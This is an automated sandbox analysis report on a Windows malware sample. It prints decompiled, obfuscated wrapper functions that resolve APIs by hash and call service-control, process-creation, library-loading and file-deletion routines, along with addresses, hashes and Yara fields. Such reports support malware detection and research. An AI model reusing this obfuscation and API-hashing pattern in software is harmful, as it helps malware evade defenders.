                                              Function 006DAA3C, Relevance: 1.5, APIs: 1, Instructions: 34fileCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 58%
                                              			E006DAA3C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				signed int _v8;
				unsigned int _v12;
				void* _t21;
				int _t27;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E006C602B(_t21);
				_v12 = 0xcc49;
				_v12 = _v12 << 6;
				_v12 = _v12 >> 2;
				_v12 = _v12 ^ 0x000ca988;
				_v8 = 0x5d85;
				_v8 = _v8 | 0xb9d19a55;
				_v8 = _v8 * 0xd;
				_v8 = _v8 ^ 0x6fa87272;
				E006D07A9(0x330b490b, 0x9164b7cc, __ecx, __ecx, 0xb9);
				_t27 = DeleteFileW(_a12); // executed
				return _t27;
			}







                                              0x006daa3f
                                              0x006daa40
                                              0x006daa41
                                              0x006daa44
                                              0x006daa47
                                              0x006daa4b
                                              0x006daa4c
                                              0x006daa51
                                              0x006daa5b
                                              0x006daa64
                                              0x006daa68
                                              0x006daa6f
                                              0x006daa76
                                              0x006daa8d
                                              0x006daa90
                                              0x006daa9d
                                              0x006daaa8
                                              0x006daaad

                                              APIs
                                              • DeleteFileW.KERNELBASE(?,?,?,?,A6E18774,?,?), ref: 006DAAA8
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.2113198407.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                              • Associated: 00000009.00000002.2113191563.00000000006C0000.00000004.00000001.sdmp Download File
                                              • Associated: 00000009.00000002.2113222676.00000000006DC000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID: DeleteFile
                                              • String ID:
                                              • API String ID: 4033686569-0
                                              • Opcode ID: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
                                              • Instruction ID: 663a755dfc6d45a7fbd065eb061e0d929363b67b5f9ec4174fd994159a9be1ad
                                              • Opcode Fuzzy Hash: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
                                              • Instruction Fuzzy Hash: 46F0F6B590020CFFDB08DF94D94A99EBBB5EB45304F10819CF915A6250D2B69B549B50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 006C5FB2, Relevance: 1.5, APIs: 1, Instructions: 33serviceCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 70%
                                              			E006C5FB2(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t21;
				int _t27;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
				E006C602B(_t21);
				_v12 = 0x33d;
				_v12 = _v12 + 0xc3dc;
				_v12 = _v12 | 0x39ccfb02;
				_v12 = _v12 ^ 0x39ccf342;
				_v8 = 0xe8d9;
				_v8 = _v8 * 0x16;
				_v8 = _v8 | 0x4145347f;
				_v8 = _v8 ^ 0x9035ef96;
				_v8 = _v8 ^ 0xd1609914;
				E006D07A9(0x6b3db31e, 0x2c3ac9a2, __ecx, __ecx, 0x1d5);
				_t27 = CloseServiceHandle(_a4); // executed
				return _t27;
			}







                                              0x006c5fb5
                                              0x006c5fb6
                                              0x006c5fb7
                                              0x006c5fbb
                                              0x006c5fbc
                                              0x006c5fc1
                                              0x006c5fcb
                                              0x006c5fd7
                                              0x006c5fde
                                              0x006c5fe5
                                              0x006c5ffc
                                              0x006c5fff
                                              0x006c6006
                                              0x006c600d
                                              0x006c601a
                                              0x006c6025
                                              0x006c602a

                                              APIs
                                              • CloseServiceHandle.ADVAPI32(39CCF342), ref: 006C6025
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.2113198407.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                              • Associated: 00000009.00000002.2113191563.00000000006C0000.00000004.00000001.sdmp Download File
                                              • Associated: 00000009.00000002.2113222676.00000000006DC000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID: CloseHandleService
                                              • String ID:
                                              • API String ID: 1725840886-0
                                              • Opcode ID: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
                                              • Instruction ID: cb0861d6890d54ac7204ff8d6eb82e3182e3e738c333d00b41e92a2462ccbc2b
                                              • Opcode Fuzzy Hash: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
                                              • Instruction Fuzzy Hash: CCF04FB0D11208FFEB48DFA0E94689EBFB9EB40300F20819CE409A7260E7B19F159F54
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Non-executed Functions

                                              Analysis Process: rundll32.exe PID: 3056 Parent PID: 2916 rundll32.exeCOMMON

                                              Executed Functions

                                              Function 001D2959, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 62%
                                              			E001D2959(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, int _a16) {
				unsigned int _v8;
				signed int _v12;
				void* _t30;
				void* _t39;
				signed int _t41;
				signed int _t42;

				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(0);
				_push(0);
				E001D602B(_t30);
				_v12 = 0x5e3c;
				_t41 = 0x63;
				_v12 = _v12 / _t41;
				_t42 = 0x2f;
				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x000064be;
				_v8 = 0x74da;
				_v8 = _v8 | 0xfefeeaea;
				_v8 = _v8 >> 0xc;
				_v8 = _v8 ^ 0x000fb531;
				E001E07A9(0x44082a3f, 0x2c3ac9a2, _t42, _t42, 0x18a);
				_t39 = OpenSCManagerW(0, 0, _a16); // executed
				return _t39;
			}









                                              0x001d295f
                                              0x001d2964
                                              0x001d2967
                                              0x001d296a
                                              0x001d296d
                                              0x001d296e
                                              0x001d296f
                                              0x001d2977
                                              0x001d2985
                                              0x001d298a
                                              0x001d2992
                                              0x001d299a
                                              0x001d29a2
                                              0x001d29a9
                                              0x001d29b0
                                              0x001d29b7
                                              0x001d29bb
                                              0x001d29cf
                                              0x001d29dc
                                              0x001d29e2

                                              APIs
                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,?), ref: 001D29DC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2114491757.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true
                                              • Associated: 0000000A.00000002.2114486408.00000000001D0000.00000004.00000001.sdmp Download File
                                              • Associated: 0000000A.00000002.2114569444.00000000001EC000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID: ManagerOpen
                                              • String ID: <^
                                              • API String ID: 1889721586-3203995635
                                              • Opcode ID: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
                                              • Instruction ID: 2def957fbdd76c8f6afaa0a2bd22bc4160f696d70807745a4914eae7dc807cb6
                                              • Opcode Fuzzy Hash: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
                                              • Instruction Fuzzy Hash: A6018072A00108BFEB14DF95DC4A8DFBFB6EF48310F108089F508A6250D7B65F619B91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 001DC6C7, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 48COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 58%
                                              			E001DC6C7(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t29;
				intOrPtr* _t33;
				void* _t34;

				E001D602B(_t29);
				_v28 = 0x4fe02f;
				_v24 = 0x232390;
				_v20 = 0xf8460;
				_v16 = 0;
				_v12 = 0xf625;
				_v12 = _v12 >> 6;
				_v12 = _v12 >> 0xa;
				_v12 = _v12 + 0xffffcc6f;
				_v12 = _v12 ^ 0xffffa5b6;
				_v8 = 0xe5cd;
				_v8 = _v8 + 0xffffae4d;
				_v8 = _v8 | 0xf8bbefe7;
				_v8 = _v8 ^ 0xf8bbcc9a;
				_t33 = E001E07A9(0x59a47438, 0xd39e34db, __ecx, __ecx, 0x1e9);
				_t34 =  *_t33(0, _a16, 0, 0, _a4, __ecx, __edx, _a4, 0, _a12, _a16, _a20, 0, 0); // executed
				return _t34;
			}












                                              0x001dc6e1
                                              0x001dc6e6
                                              0x001dc6f0
                                              0x001dc6fc
                                              0x001dc703
                                              0x001dc706
                                              0x001dc70d
                                              0x001dc711
                                              0x001dc715
                                              0x001dc71c
                                              0x001dc723
                                              0x001dc72a
                                              0x001dc731
                                              0x001dc738
                                              0x001dc751
                                              0x001dc762
                                              0x001dc768

                                              APIs
                                              • SHGetFolderPathW.SHELL32(00000000,00232390,00000000,00000000,FFFFA5B6), ref: 001DC762
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2114491757.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true
                                              • Associated: 0000000A.00000002.2114486408.00000000001D0000.00000004.00000001.sdmp Download File
                                              • Associated: 0000000A.00000002.2114569444.00000000001EC000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID: FolderPath
                                              • String ID: /O
                                              • API String ID: 1514166925-1923427199
                                              • Opcode ID: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
                                              • Instruction ID: 4a01790a23612c8bc0685b17fe082e26f4db6c5654d638d0cee67d8c555ea358
                                              • Opcode Fuzzy Hash: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
                                              • Instruction Fuzzy Hash: D31133B290122DBBCB25DF95DC498DFBFB8EF14714F108188F90962210D3B14B659BE0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 001D1000, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42libraryCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 82%
                                              			E001D1000(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _t33;
				struct HINSTANCE__* _t40;
				signed int _t42;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E001D602B(_t33);
				_v16 = _v16 & 0x00000000;
				_v24 = 0x1b2eda;
				_v20 = 0x33a3b7;
				_v12 = 0x98c;
				_v12 = _v12 + 0xb426;
				_v12 = _v12 + 0x5beb;
				_t42 = 0x63;
				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x00000fce;
				_v8 = 0x120e;
				_v8 = _v8 + 0xfffffcb8;
				_v8 = _v8 + 0xffffefaa;
				_v8 = _v8 >> 5;
				_v8 = _v8 ^ 0x07ff9a02;
				E001E07A9(0xa900db79, 0x9164b7cc, _t42, _t42, 0xdd);
				_t40 = LoadLibraryW(_a12); // executed
				return _t40;
			}











                                              0x001d1006
                                              0x001d1009
                                              0x001d100c
                                              0x001d1011
                                              0x001d1016
                                              0x001d101d
                                              0x001d1026
                                              0x001d102d
                                              0x001d1034
                                              0x001d103b
                                              0x001d1047
                                              0x001d104f
                                              0x001d1057
                                              0x001d105e
                                              0x001d1065
                                              0x001d106c
                                              0x001d1073
                                              0x001d1077
                                              0x001d108b
                                              0x001d1096
                                              0x001d109b

                                              APIs
                                              • LoadLibraryW.KERNEL32(0033A3B7), ref: 001D1096
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2114491757.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true
                                              • Associated: 0000000A.00000002.2114486408.00000000001D0000.00000004.00000001.sdmp Download File
                                              • Associated: 0000000A.00000002.2114569444.00000000001EC000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID: LibraryLoad
                                              • String ID: [
                                              • API String ID: 1029625771-3431493590
                                              • Opcode ID: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
                                              • Instruction ID: 6c9247c1494e0430e7af192e2c9ebdad8a4dc037f7a170ec8d45a2d22dfa5ef9
                                              • Opcode Fuzzy Hash: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
                                              • Instruction Fuzzy Hash: F1015BB6D01708BBDF04DF94C94A5DEBBB1AB54318F108188E41466291D3B19B649B91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 001D4859, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 28COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E001D4859() {
				signed int _v8;
				signed int _v12;
				void* _t22;

				_v12 = 0xafe2;
				_v12 = _v12 * 0x42;
				_v12 = _v12 + 0xffffdd89;
				_v12 = _v12 ^ 0x002d198d;
				_v8 = 0x5b09;
				_v8 = _v8 | 0xa1ea9544;
				_v8 = _v8 * 0x12;
				_v8 = _v8 ^ 0x6283d9c1;
				E001E07A9(0xc44181ea, 0x9164b7cc, _t22, _t22, 0x1a5);
				ExitProcess(0);
			}






                                              0x001d485e
                                              0x001d487a
                                              0x001d487d
                                              0x001d4884
                                              0x001d488b
                                              0x001d4892
                                              0x001d489d
                                              0x001d48a0
                                              0x001d48ad
                                              0x001d48b7

                                              APIs
                                              • ExitProcess.KERNELBASE(00000000), ref: 001D48B7
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2114491757.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true
                                              • Associated: 0000000A.00000002.2114486408.00000000001D0000.00000004.00000001.sdmp Download File
                                              • Associated: 0000000A.00000002.2114569444.00000000001EC000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID: ExitProcess
                                              • String ID: [
                                              • API String ID: 621844428-1822564810
                                              • Opcode ID: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
                                              • Instruction ID: 4d233150a7b1b8d0ca9ed02e51ebcc8e11366db29454cee23ee02343d5930ca8
                                              • Opcode Fuzzy Hash: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
                                              • Instruction Fuzzy Hash: A0F017B0E05209FBDB04CFE8CA5699EBFB9EB40301F20818CE444B7290E3B15F509B50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 001E4F7D, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 32COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 66%
                                              			E001E4F7D(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t17;
				int _t24;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
				E001D602B(_t17);
				_v12 = 0xddd8;
				_v12 = _v12 * 0x48;
				_v12 = _v12 ^ 0x003e66d8;
				_v8 = 0xcb35;
				_v8 = _v8 ^ 0x7b88573c;
				_v8 = _v8 * 0x59;
				_v8 = _v8 ^ 0xf27e4a21;
				E001E07A9(0x6d6c237b, 0x9164b7cc, __ecx, __ecx, 0xce);
				_t24 = CloseHandle(_a4); // executed
				return _t24;
			}







                                              0x001e4f80
                                              0x001e4f81
                                              0x001e4f82
                                              0x001e4f86
                                              0x001e4f87
                                              0x001e4f8c
                                              0x001e4fa5
                                              0x001e4fa8
                                              0x001e4faf
                                              0x001e4fb6
                                              0x001e4fc7
                                              0x001e4fca
                                              0x001e4fd7
                                              0x001e4fe2
                                              0x001e4fe7

                                              APIs
                                              • CloseHandle.KERNELBASE(003E66D8), ref: 001E4FE2
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2114491757.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true
                                              • Associated: 0000000A.00000002.2114486408.00000000001D0000.00000004.00000001.sdmp Download File
                                              • Associated: 0000000A.00000002.2114569444.00000000001EC000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID: CloseHandle
                                              • String ID: {#lm
                                              • API String ID: 2962429428-1564096886
                                              • Opcode ID: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
                                              • Instruction ID: 6704b2815e5b6340f86946b0b895de4bfb083cb0925a4a1645cfd3f49927c494
                                              • Opcode Fuzzy Hash: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
                                              • Instruction Fuzzy Hash: 50F037B0C1120CFFDB04DFA4D98289EBFBAEB44300F208199E804AB250D3715B509B50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 001E976F, Relevance: 1.6, APIs: 1, Instructions: 63processCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 21%
                                              			E001E976F(void* __ecx, struct _PROCESS_INFORMATION* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, struct _STARTUPINFOW* _a20, int _a24, intOrPtr _a28, intOrPtr _a40, intOrPtr _a44, intOrPtr _a52, intOrPtr _a56, WCHAR* _a60, WCHAR* _a68) {
				unsigned int _v8;
				signed int _v12;
				void* _t34;
				int _t39;
				struct _PROCESS_INFORMATION* _t48;

				_push(__ecx);
				_push(__ecx);
				_t48 = __edx;
				_push(0);
				_push(_a68);
				_push(0);
				_push(_a60);
				_push(_a56);
				_push(_a52);
				_push(0);
				_push(_a44);
				_push(_a40);
				_push(0);
				_push(0);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E001D602B(_t34);
				_v12 = 0xaff9;
				_v12 = _v12 | 0xcee54bd1;
				_v12 = _v12 + 0x6ed6;
				_v12 = _v12 ^ 0xcee61221;
				_v8 = 0x6229;
				_v8 = _v8 ^ 0x42aa9f31;
				_v8 = _v8 >> 2;
				_v8 = _v8 ^ 0x10aad83f;
				E001E07A9(0xf0de9e9f, 0x9164b7cc, __ecx, __ecx, 0x155);
				_t39 = CreateProcessW(_a68, _a60, 0, 0, _a24, 0, 0, 0, _a20, _t48); // executed
				return _t39;
			}








                                              0x001e9772
                                              0x001e9773
                                              0x001e9778
                                              0x001e977a
                                              0x001e977b
                                              0x001e977e
                                              0x001e977f
                                              0x001e9782
                                              0x001e9785
                                              0x001e9788
                                              0x001e9789
                                              0x001e978c
                                              0x001e978f
                                              0x001e9790
                                              0x001e9791
                                              0x001e9794
                                              0x001e9797
                                              0x001e979a
                                              0x001e979d
                                              0x001e97a0
                                              0x001e97a3
                                              0x001e97a6
                                              0x001e97a7
                                              0x001e97a8
                                              0x001e97ad
                                              0x001e97b7
                                              0x001e97c3
                                              0x001e97ca
                                              0x001e97d1
                                              0x001e97d8
                                              0x001e97df
                                              0x001e97e3
                                              0x001e97fc
                                              0x001e9816
                                              0x001e981d

                                              APIs
                                              • CreateProcessW.KERNEL32(001D591A,?,00000000,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,001D591A), ref: 001E9816
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2114491757.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true
                                              • Associated: 0000000A.00000002.2114486408.00000000001D0000.00000004.00000001.sdmp Download File
                                              • Associated: 0000000A.00000002.2114569444.00000000001EC000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID: CreateProcess
                                              • String ID:
                                              • API String ID: 963392458-0
                                              • Opcode ID: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
                                              • Instruction ID: c55db46f124b2cc675f9668ff90ed3c07b71415c0d78f6d611415f865274e5c6
                                              • Opcode Fuzzy Hash: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
                                              • Instruction Fuzzy Hash: 0C11B372901188BFDF1A9FD6DC0ACDF7F7AEF89750F104148FA1556120D2728AA0EBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 001DB566, Relevance: 1.6, APIs: 1, Instructions: 55fileCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 31%
                                              			E001DB566(void* __ecx, long __edx, intOrPtr _a4, intOrPtr _a8, long _a12, intOrPtr _a16, intOrPtr _a24, intOrPtr _a28, long _a32, intOrPtr _a36, intOrPtr _a40, long _a44, WCHAR* _a48) {
				unsigned int _v8;
				signed int _v12;
				void* _t32;
				void* _t38;
				long _t47;

				_push(__ecx);
				_push(__ecx);
				_push(_a48);
				_t47 = __edx;
				_push(_a44);
				_push(_a40);
				_push(_a36);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(0);
				E001D602B(_t32);
				_v8 = 0xfd14;
				_v8 = _v8 >> 4;
				_v8 = _v8 * 0x7a;
				_v8 = _v8 >> 9;
				_v8 = _v8 ^ 0x00002bef;
				_v12 = 0x4f26;
				_v12 = _v12 | 0xe7e97f76;
				_v12 = _v12 ^ 0xe7e94dbb;
				E001E07A9(0xfbdf2264, 0x9164b7cc, __ecx, __ecx, 0x1bd);
				_t38 = CreateFileW(_a48, _a12, _t47, 0, _a44, _a32, 0); // executed
				return _t38;
			}








                                              0x001db569
                                              0x001db56a
                                              0x001db56d
                                              0x001db572
                                              0x001db574
                                              0x001db577
                                              0x001db57a
                                              0x001db57d
                                              0x001db580
                                              0x001db583
                                              0x001db586
                                              0x001db587
                                              0x001db58a
                                              0x001db58d
                                              0x001db590
                                              0x001db593
                                              0x001db594
                                              0x001db595
                                              0x001db59a
                                              0x001db5a4
                                              0x001db5b8
                                              0x001db5c0
                                              0x001db5c4
                                              0x001db5cb
                                              0x001db5d2
                                              0x001db5d9
                                              0x001db5e6
                                              0x001db5fd
                                              0x001db604

                                              APIs
                                              • CreateFileW.KERNELBASE(001E0668,?,?,00000000,?,?,00000000,?,?,?,047BBE06,001E0668,?,?,?,?), ref: 001DB5FD
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2114491757.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true
                                              • Associated: 0000000A.00000002.2114486408.00000000001D0000.00000004.00000001.sdmp Download File
                                              • Associated: 0000000A.00000002.2114569444.00000000001EC000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID: CreateFile
                                              • String ID:
                                              • API String ID: 823142352-0
                                              • Opcode ID: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
                                              • Instruction ID: 37c1b1c4d25d484248efe105347f02daa2207a1a560edb8fe11a26f7b2631849
                                              • Opcode Fuzzy Hash: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
                                              • Instruction Fuzzy Hash: 0611C372801248BBDF16DF95DD06CEE7F7AFF89314F148198FA1862120D3729A60EB50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 001E981E, Relevance: 1.5, APIs: 1, Instructions: 43memoryCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 54%
                                              			E001E981E(long __ecx, void* __edx, long _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				void* _t22;
				void* _t28;
				void* _t34;
				long _t37;

				_push(__ecx);
				_push(__ecx);
				_push(_a16);
				_t34 = __edx;
				_t37 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E001D602B(_t22);
				_v12 = 0xe68;
				_v12 = _v12 * 0x39;
				_v12 = _v12 ^ 0xd1b1d871;
				_v12 = _v12 ^ 0xd1b2fb7e;
				_v8 = 0x629e;
				_v8 = _v8 + 0xfffff5da;
				_v8 = _v8 | 0xbef7b77b;
				_v8 = _v8 ^ 0xbef79fc3;
				E001E07A9(0xd2423672, 0x9164b7cc, __ecx, __ecx, 0x1ff);
				_t28 = RtlAllocateHeap(_t34, _a4, _t37); // executed
				return _t28;
			}









                                              0x001e9821
                                              0x001e9822
                                              0x001e9825
                                              0x001e9828
                                              0x001e982a
                                              0x001e982c
                                              0x001e982f
                                              0x001e9832
                                              0x001e9835
                                              0x001e9836
                                              0x001e9837
                                              0x001e983c
                                              0x001e9855
                                              0x001e9858
                                              0x001e985f
                                              0x001e9866
                                              0x001e986d
                                              0x001e9874
                                              0x001e987b
                                              0x001e988e
                                              0x001e989b
                                              0x001e98a2

                                              APIs
                                              • RtlAllocateHeap.NTDLL(00000000,D1B2FB7E,00000001,?,?,?,001D87F2,0000CAAE,0000510C,AD82F196), ref: 001E989B
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2114491757.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true
                                              • Associated: 0000000A.00000002.2114486408.00000000001D0000.00000004.00000001.sdmp Download File
                                              • Associated: 0000000A.00000002.2114569444.00000000001EC000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID: AllocateHeap
                                              • String ID:
                                              • API String ID: 1279760036-0
                                              • Opcode ID: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
                                              • Instruction ID: b7709b50ae51164d8aeb1307988349b9148569f66681926d56ec9366ccc2218f
                                              • Opcode Fuzzy Hash: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
                                              • Instruction Fuzzy Hash: BA019A72801208FBDB04EFD5D846CDFBF79EF85310F108189F908A6220E6715B619BA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 001E7BF4, Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 62%
                                              			E001E7BF4(struct _SHFILEOPSTRUCTW* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				void* _t24;
				int _t31;
				signed int _t33;
				struct _SHFILEOPSTRUCTW* _t40;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_t40 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E001D602B(_t24);
				_v8 = 0xa117;
				_t33 = 0x76;
				_v8 = _v8 / _t33;
				_v8 = _v8 >> 4;
				_v8 = _v8 ^ 0x210fe703;
				_v8 = _v8 ^ 0x210fdcea;
				_v12 = 0xf1e9;
				_v12 = _v12 << 9;
				_v12 = _v12 ^ 0x01e3a445;
				E001E07A9(0x6b98377a, 0xd39e34db, _t33, _t33, 0x219);
				_t31 = SHFileOperationW(_t40); // executed
				return _t31;
			}









                                              0x001e7bf7
                                              0x001e7bf8
                                              0x001e7bfa
                                              0x001e7bfd
                                              0x001e7bff
                                              0x001e7c02
                                              0x001e7c06
                                              0x001e7c07
                                              0x001e7c0f
                                              0x001e7c1d
                                              0x001e7c25
                                              0x001e7c2d
                                              0x001e7c31
                                              0x001e7c38
                                              0x001e7c3f
                                              0x001e7c46
                                              0x001e7c4a
                                              0x001e7c5e
                                              0x001e7c67
                                              0x001e7c6d

                                              APIs
                                              • SHFileOperationW.SHELL32(68CF93E9,?,?,?,?,?,?), ref: 001E7C67
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2114491757.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true
                                              • Associated: 0000000A.00000002.2114486408.00000000001D0000.00000004.00000001.sdmp Download File
                                              • Associated: 0000000A.00000002.2114569444.00000000001EC000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID: FileOperation
                                              • String ID:
                                              • API String ID: 3080627654-0
                                              • Opcode ID: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
                                              • Instruction ID: e7037390f7e7bacdf7c2bd971d6ce7ccbf9953c3af2e8e0c38516eaa01a5caa6
                                              • Opcode Fuzzy Hash: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
                                              • Instruction Fuzzy Hash: 28014BB190120CFFEB09DFA4C84A8DEBBB9EF54314F208199F405A7240EBB15F509B91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 001DF65F, Relevance: 1.5, APIs: 1, Instructions: 40serviceCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 52%
                                              			E001DF65F(int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, short* _a12, void* _a16, intOrPtr _a20) {
				unsigned int _v8;
				signed int _v12;
				void* _t24;
				void* _t29;
				int _t35;

				_push(__ecx);
				_push(__ecx);
				_push(_a20);
				_t35 = __ecx;
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E001D602B(_t24);
				_v12 = 0xd5a7;
				_v12 = _v12 ^ 0x994cba9d;
				_v12 = _v12 ^ 0x994c19d3;
				_v8 = 0xac88;
				_v8 = _v8 << 3;
				_v8 = _v8 >> 8;
				_v8 = _v8 + 0xebed;
				_v8 = _v8 ^ 0x0000ab82;
				E001E07A9(0x1b506617, 0x2c3ac9a2, __ecx, __ecx, 0x18c);
				_t29 = OpenServiceW(_a16, _a12, _t35); // executed
				return _t29;
			}








                                              0x001df662
                                              0x001df663
                                              0x001df665
                                              0x001df668
                                              0x001df66a
                                              0x001df66d
                                              0x001df670
                                              0x001df673
                                              0x001df677
                                              0x001df678
                                              0x001df67d
                                              0x001df687
                                              0x001df693
                                              0x001df69a
                                              0x001df6a1
                                              0x001df6a5
                                              0x001df6a9
                                              0x001df6b0
                                              0x001df6c9
                                              0x001df6d8
